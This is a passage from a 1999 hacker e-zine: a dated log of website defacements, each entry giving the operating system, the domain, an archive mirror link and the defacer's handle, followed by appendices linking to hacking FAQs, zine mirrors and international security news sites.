Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: publicistasweb.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/publicistasweb.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: robertward.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/robertward.com
Defaced by: acid k|own
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: santiagowebdirectory.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/santiagowebdirectory.com
Defaced by: acidklown
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: conto.ru
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/conto.ru
Defaced by: ytcracker
Operating System: NMAP says FreeBSD, Server says IIS/4.0
Date 11/7/99
Defaced domain: webpeopleschoice.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/webpeopleschoice.com
Defaced by: acidklown
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: textadvertising.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/textadvertising.com
Defaced by: acidklown
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: www.ariel.muni.il
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.ariel.muni.il
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: quitowebdirectory.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/quitowebdirectory.com
Defaced by: acidklown
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: tecktron.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/tecktron.com
Defaced by: acidklown
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: surplus2000.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/surplus2000.com
Defaced by: acidklown
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: www.tatincom.ru
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.tatincom.ru
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Date 11/7/99
Defaced domain: www.mastic.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.mastic.gov.my
Defaced by: JxLxMx
Operating System: Windows NT
Date 11/7/99
Defaced domain: www.tce.se.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.tce.se.gov.br
Defaced by: NFO Insecure Team
Date 11/7/99
Defaced domain: www.sghms.ac.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.sghms.ac.uk
Defaced by: tefx
Operating System: Solaris
Date 11/7/99
Defaced domain: www.ccsiinc.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.ccsiinc.com
Defaced by: ph33r the b33r
Operating System: Digital Unix
Date 11/7/99
Defaced domain: www.lths.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.lths.org
Defaced by: ytcracker
Operating System: Windows NT
Date 11/7/99
Defaced domain: www.reiseblitz.de
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.reiseblitz.de
Defaced by: z0z
Operating System: Solaris
Date 11/7/99
Defaced domain: www.clubx.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.clubx.com
Defaced by: twd
Operating System: BSDI
Date 11/7/99
Defaced domain: www.ak-prepared.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.ak-prepared.com
Defaced by: ytcracker
Operating System: Windows NT
Date 11/7/99
Defaced domain: www.opic.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.opic.gov
Defaced by: hV2k
Operating System: Windows NT
Date 11/7/99
Defaced domain: www.stlib.state.nm.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.stlib.state.nm.us
Defaced by: hV2k
Operating System: Windows NT
Date 11/7/99
Defaced domain: www.usis.com.ba
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.usis.com.ba
Defaced by: Pakastan Hackerz Club
Operating System: Windows 95
Date 11/7/99
Defaced domain: monitoring2.er.usgs.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/monitoring2.er.usgs.gov
Defaced by: ytcracker
Operating System: Windows NT
Date 11/7/99
Defaced domain: www.dongac.ac.kr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.dongac.ac.kr
Defaced by: TREATY
Operating System: Linux
Date 11/7/99
Defaced domain: txdps.state.tx.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/txdps.state.tx.us
Defaced by: ytcracker
Operating System: Windows NT
Date 11/7/99
Defaced domain: www.trentonlibrary.state.nj.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/07/www.trentonlibrary.state.nj.us
Defaced by: ytcracker
Operating System: Windows NT
Date 11/7/99
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://securax.org/cum/ *New address*
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Columbia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
